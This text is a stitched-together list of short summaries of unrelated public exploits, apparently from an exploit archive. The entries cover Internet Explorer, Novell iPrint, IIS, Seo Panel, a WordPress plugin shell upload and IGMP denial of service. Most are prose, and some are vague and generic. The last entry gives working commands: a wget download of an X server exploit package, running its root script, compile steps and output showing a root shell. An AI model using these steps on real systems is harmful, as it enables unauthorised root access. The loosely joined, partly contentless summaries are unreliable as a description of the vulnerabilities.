This exploit is a remote system access vulnerability in Microsoft Internet Explorer 6.x & 7 Beta 2. It is caused by a buffer overflow in the createTextRange() function. The exploit uses a shellcode to download a malicious file from a remote server and execute it on the victim's machine. The exploit is unpatched and has a critical severity.
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. Authentication is not required to exploit this vulnerability. The specific flaw exists within the mshtml.dll component of Internet Explorer. The vulnerability is due to a boundary error when processing a specially crafted HTML page. An attacker can leverage this vulnerability to execute arbitrary code under the context of the user running Internet Explorer.
This exploit is a proof of concept exploit created by Firestorm, based on zloSend.exe win32 exploit. It is used to send a malicious packet to the victim's machine, which causes a denial of service. It is tested on Windows XP SP2 as victim and compiled/runned on Fedora Core 4 x86.
This exploit is a remote code execution vulnerability in Novell iPrint <= 5.52. It is triggered by calling the GetDriverSettings() ActiveX control with specially crafted arguments. This will cause the application to execute arbitrary code, allowing an attacker to gain control of the system.
This exploit is a denial of service (DoS) attack against the Microsoft IIS web server. It is a buffer overflow vulnerability that allows an attacker to send a maliciously crafted request to the web server, causing it to crash. The exploit is written in C and uses Winsock2 to send the malicious request.
A vulnerability exists in 'Seo Panel' page rendering which allows for unfiltered, unencrypted content to be presented to a user through two different cookies. Alter the value of cookies called 'default_news' or 'sponsors' and then view a site page which includes controllers/index.ctrl.php or controllers/settings.ctrl.php that will render the cookies as they exist on the user's machine.
This exploit is for the Freewps 2.11 plugin for WordPress. It allows an attacker to execute arbitrary code on the remote system by uploading a shell. The exploit is triggered by sending a POST request to the freewps.php file with the command to be executed as a parameter.
This exploit is a Denial of Service (DoS) attack against IGMP v3 protocol. It sends a malicious packet to the target system which causes the system to crash. This exploit affects Microsoft Windows XP and Windows Server 2003.
This vulnerability is caused by an unspecified event handler in the application. An attacker can exploit this vulnerability by crafting a malicious payload and injecting it into the application. This can lead to arbitrary code execution, information disclosure, and other malicious activities.
Two second exploit, but if anyone is lazy: $ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz $ tar -zpxvf xmodulepath.tgz $ cd xmodulepath $ ./root.sh /bin/rm -f exploit.o exploit.so shell *.o *.so gcc -fPIC -c exploit.c gcc -shared -nostdlib exploit.o -o exploit.so gcc -o shell shell.c X Window System Version 7.0.0 Release Date: 21 December 2005 X Protocol Version 11, Revision 0, Release 7.0 [ snip ] r00t # id uid=0(root) gid=100(users) groups=10(wheel),18(audio)...